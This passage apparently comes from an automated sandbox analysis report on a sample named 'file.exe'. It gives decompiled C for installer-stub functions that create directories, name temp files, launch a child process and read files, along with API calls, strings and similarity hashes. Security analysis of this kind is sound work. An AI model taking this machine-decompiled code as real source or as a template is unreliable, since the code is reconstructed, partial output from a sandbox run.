				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E004029F6(0xfffffff0);
				_t10 = E00405593(_t25);
				_t27 = _t10;
				if(_t10 != __ebx) {
					do {
						_t29 = E0040552A(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L4:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L4;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405A0C("C:\\Baldi", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}

0x004015b3
0x004015ba
0x004015bd
0x004015c2
0x004015c6
0x004015c8
0x004015d0
0x004015d6
0x004015d8
0x004015db
0x004015e3
0x004015f0
0x004015fd
0x004015fd
0x004015f2
0x004015f3
0x004015fb
0x00000000
0x00000000
0x004015fb
0x004015f0
0x00401600
0x00401603
0x00401605
0x00401606
0x004015c8
0x0040160d
0x0040162d
0x00402164
0x0040160f
0x00401611
0x0040161c
0x00401622
0x00401622
0x0040288e
0x0040289a

APIs

Part of subcall function 00405593: CharNextA.USER32(ES@,?,0042B3E8,00000000,004055F7,0042B3E8,0042B3E8,?,?,00000000,00405345,?,"C:\Users\user\Desktop\file.exe",00000000), ref: 004055A1
Part of subcall function 00405593: CharNextA.USER32(00000000), ref: 004055A6
Part of subcall function 00405593: CharNextA.USER32(00000000), ref: 004055B5

CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
SetCurrentDirectoryA.KERNELBASE(00000000,C:\Baldi,00000000,00000000,000000F0), ref: 00401622

Strings

C:\Baldi, xrefs: 00401617

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
String ID: C:\Baldi
API String ID: 3751793516-1626666659
Opcode ID: 360e2cbe79de91032a44b72a5c5ff191f5bd6e6521d3b477c7bacda235078696
Instruction ID: bf1eb0eabc3c1df6ff2fb323ed3efcd7168262dea338722757ad05095e7f5395
Opcode Fuzzy Hash: 360e2cbe79de91032a44b72a5c5ff191f5bd6e6521d3b477c7bacda235078696
Instruction Fuzzy Hash: AB012631908180AFDB217F756D449BF6BB0EA56365728073FF492B22E2C23C4D42962E

Uniqueness

Uniqueness Score: -1.00%

Function 00405712 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405712(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}

0x00405716
0x0040571c
0x0040571d
0x0040571d
0x0040571e
0x00405725
0x0040572f
0x0040573c
0x0040573f
0x00405747
0x00000000
0x00000000
0x0040574b
0x00000000
0x00000000
0x0040574d
0x00000000
0x0040574d
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00405725
GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 0040573F

Strings

"C:\Users\user\Desktop\file.exe", xrefs: 00405719
nsa, xrefs: 0040571E
C:\Users\user\AppData\Local\Temp\, xrefs: 00405712, 00405715

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\file.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-3499081733
Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
Instruction ID: 857343acb9398127b83b67a88284cb3acf20d602f6beb627bdaaa73bf87bc8f8
Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
Instruction Fuzzy Hash: 19F0A736348204BAE7105E55DC04B9B7F99DFD1750F14C027F9449B1C0D6F099589BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040526C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040526C(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x42bfe8->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x42bfe8,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x00405275
0x00405291
0x00405299
0x0040529e
0x00000000
0x004052a4
0x004052a8

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0042BFE8,Error launching installer), ref: 00405291
CloseHandle.KERNEL32(?), ref: 0040529E

Strings

Error launching installer, xrefs: 0040527F
C:\Users\user\AppData\Local\Temp\, xrefs: 0040526C

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
API String ID: 3712363035-2984075973
Opcode ID: dc33ac1254d82063a7b9e43172f0f507123e59eb9c5a5fd92b1179a08dc1bdb0
Instruction ID: 9c205d3d1494e9e4afb0e3639077779a104ecf70f113e6d393e41fe649cd8d97
Opcode Fuzzy Hash: dc33ac1254d82063a7b9e43172f0f507123e59eb9c5a5fd92b1179a08dc1bdb0
Instruction Fuzzy Hash: FBE0ECB4A04209ABEB00EF64ED09D7B7BBCEB00304B408522A911E2290D778E410CEB9

Uniqueness

Uniqueness Score: -1.00%

Function 004030C6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E004030C6(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
				E00405C6E(_t6);
				_t2 = E0040556C(_t6);
				if(_t2 != 0) {
					E004054FF(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E00405712("1049", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}

0x004030c7
0x004030cd
0x004030d3
0x004030da
0x004030df
0x004030e7
0x004030f3
0x004030f9
0x004030dd
0x004030dd
0x004030dd

APIs

Part of subcall function 00405C6E: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\file.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030D2,C:\Users\user\AppData\Local\Temp\,00000000,00403244), ref: 00405CC6
Part of subcall function 00405C6E: CharNextA.USER32(?,?,?,00000000), ref: 00405CD3
Part of subcall function 00405C6E: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\file.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030D2,C:\Users\user\AppData\Local\Temp\,00000000,00403244), ref: 00405CD8
Part of subcall function 00405C6E: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\file.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030D2,C:\Users\user\AppData\Local\Temp\,00000000,00403244), ref: 00405CE8

CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403244), ref: 004030E7

Strings

1049, xrefs: 004030EE
C:\Users\user\AppData\Local\Temp\, xrefs: 004030C7, 004030CC, 004030D2, 004030DE, 004030E6, 004030ED

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID: 1049$C:\Users\user\AppData\Local\Temp\
API String ID: 4115351271-4112380293
Opcode ID: 9fc94c8ce289ceace51d82d7694160c71b26e7ee5232ad3accb455f1d4d4e313
Instruction ID: 7f1b43601f0a10077d0081c2ba5ec5825ac71a1bded9547d22d949ebda8a6a9f
Opcode Fuzzy Hash: 9fc94c8ce289ceace51d82d7694160c71b26e7ee5232ad3accb455f1d4d4e313
Instruction Fuzzy Hash: B6D0922150AD3031D651322A3E06BCF154D8F4636AF65807BF944B608A4A6C2A825AEE

Uniqueness

Uniqueness Score: -1.00%

Function 00401E1B Relevance: 4.5, APIs: 3, Instructions: 48
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00401E1B() {
				void* _t15;
				void* _t24;
				void* _t26;
				void* _t31;

				_t28 = E004029F6(_t24);
				E00404DAA(0xffffffeb, _t13);
				_t15 = E0040526C(_t28); // executed
				 *(_t31 + 8) = _t15;
				if(_t15 == _t24) {
					 *((intOrPtr*)(_t31 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t31 - 0x1c)) != _t24) {
						while(WaitForSingleObject( *(_t31 + 8), 0x64) == 0x102) {
							E00405D67(0xf);
						}
						GetExitCodeProcess( *(_t31 + 8), _t31 - 8); // executed
						if( *((intOrPtr*)(_t31 - 0x20)) < _t24) {
							if( *(_t31 - 8) != _t24) {
								 *((intOrPtr*)(_t31 - 4)) = 1;
							}
						} else {
							E0040596A(_t26,  *(_t31 - 8));
						}
					}
					_push( *(_t31 + 8));
					CloseHandle();
				}
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t31 - 4));
				return 0;
			}

0x00401e21
0x00401e26
0x00401e2c
0x00401e33
0x00401e36
0x0040265c
0x00401e3c
0x00401e3f
0x00401e50
0x00401e4b
0x00401e4b
0x00401e65
0x00401e6e
0x00401e7e
0x00401e80
0x00401e80
0x00401e70
0x00401e74
0x00401e74
0x00401e6e
0x00401e87
0x00401e8a
0x00401e8a
0x0040288e
0x0040289a

APIs

Part of subcall function 00404DAA: lstrlenA.KERNEL32(004297B8,00000000,?,74D0EA30,?,?,?,?,?,?,?,?,?,00402FB6,00000000,?), ref: 00404DE3
Part of subcall function 00404DAA: lstrlenA.KERNEL32(00402FB6,004297B8,00000000,?,74D0EA30,?,?,?,?,?,?,?,?,?,00402FB6,00000000), ref: 00404DF3
Part of subcall function 00404DAA: lstrcatA.KERNEL32(004297B8,00402FB6,00402FB6,004297B8,00000000,?,74D0EA30), ref: 00404E06
Part of subcall function 00404DAA: SetWindowTextA.USER32(004297B8,004297B8), ref: 00404E18
Part of subcall function 00404DAA: SendMessageA.USER32 ref: 00404E3E
Part of subcall function 00404DAA: SendMessageA.USER32 ref: 00404E58
Part of subcall function 00404DAA: SendMessageA.USER32 ref: 00404E66

Part of subcall function 0040526C: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0042BFE8,Error launching installer), ref: 00405291
Part of subcall function 0040526C: CloseHandle.KERNEL32(?), ref: 0040529E

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E55
GetExitCodeProcess.KERNELBASE ref: 00401E65
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401E8A

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
String ID:
API String ID: 3521207402-0
Opcode ID: 86fa43f44297ca7e66808e604d1c65e45950f8e58a0d971947a8ec94239edcf6
Instruction ID: b33c81b7bc3b485aca967e7674fca75add98f6be2a8732829935c4442cdc9329
Opcode Fuzzy Hash: 86fa43f44297ca7e66808e604d1c65e45950f8e58a0d971947a8ec94239edcf6
Instruction Fuzzy Hash: 99018071904214EBDF11AFA1CD859AE7A75EF00348F24403BF906B61E1C3794A82DB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42eb90;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42e34c =  *0x42e34c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42e34c, 0x7530,  *0x42e334), 0);
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32 ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: cf7b3020d7635a73a7f034f7f9c2b240c5e2222d46fcf66a2415134205071e91
Instruction ID: 8223ec958efd2c964e321ebce6dca8e406ed2778dd364e0d2667d4e2a9ef0db3
Opcode Fuzzy Hash: cf7b3020d7635a73a7f034f7f9c2b240c5e2222d46fcf66a2415134205071e91
Instruction Fuzzy Hash: FE01F4317242109BE7299B799D04B6A36D8E710325F14453FF955F72F1D678DC028B4D

Uniqueness

Uniqueness Score: -1.00%

Function 004056E3 Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

			E004056E3(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x004056e7
0x004056f4
0x00405709
0x0040570f

APIs

GetFileAttributesA.KERNELBASE(00000003,00402C62,C:\Users\user\Desktop\file.exe,80000000,00000003), ref: 004056E7
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405709

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
Instruction ID: 518821d5ca0a74227a37217cadb520a33af9faec79942caa6648154b48e23ab6
Opcode Fuzzy Hash: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
Instruction Fuzzy Hash: DDD09E71658301AFEF098F20DE1AF2E7AA2EB84B01F10962CB646940E0D6715C15DB16

Uniqueness

Uniqueness Score: -1.00%

Function 004056C4 Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004056C4(CHAR* _a4) {
				signed char _t3;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t3;
			}

0x004056c8
0x004056d1
0x00000000
0x004056da
0x004056e0

APIs

GetFileAttributesA.KERNELBASE(?,004054CF,?,?,?), ref: 004056C8
SetFileAttributesA.KERNEL32(?,00000000), ref: 004056DA

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
Instruction ID: 8174f72b6c2f00669cb3d5f93c0fb6c6646d93779de37800628d5af5c47e1667
Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
Instruction Fuzzy Hash: C7C002B1808501AAD6015B24DF0D81E7A66EB50361B508F25F569A00F0C7355866DA1A

Uniqueness

Uniqueness Score: -1.00%

Function 0040307D Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040307D(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}

0x00403081
0x00403094
0x0040309c
0x00000000
0x004030a3
0x00000000
0x004030a5

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402EAA,000000FF,00000004,00000000,00000000,00000000), ref: 00403094

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
Instruction ID: 43e3c0ed55451ca58d66c179b0d5cd373ba627774d09ad719adf1b780fd88a5d
Opcode Fuzzy Hash: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
Instruction Fuzzy Hash: F0E08631101119BBCF105E61AC00A9B3F9CEB05362F00C032FA04E5190D538DA14DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004030AF Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004030AF(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
				return _t2;
			}

0x004030bd
0x004030c3

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402DE9,?), ref: 004030BD

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
Instruction ID: eafd0aff1283cdec3023edec91852d87283cefa69c9b21bce59c6677f93a42a7
Opcode Fuzzy Hash: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
Instruction Fuzzy Hash: 14B01271644200BFDB214F00DF06F057B21A790701F108030B344380F082712420EB1E

Uniqueness

Uniqueness Score: -1.00%

Function 0040347B Relevance: 1.3, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040347B() {
				void* _t1;
				void* _t5;
				signed int _t7;

				_t1 =  *0x409014; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x409014 =  *0x409014 | 0xffffffff;
					_t7 =  *0x409014;
				}
				E004034C0();
				return E00405331(_t5, _t7, 0x435800, 7);
			}

0x0040347b
0x00403483
0x00403486
0x0040348c
0x0040348c
0x0040348c
0x00403493
0x004034a4

APIs

CloseHandle.KERNEL32(FFFFFFFF,004032EB,00000000), ref: 00403486

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

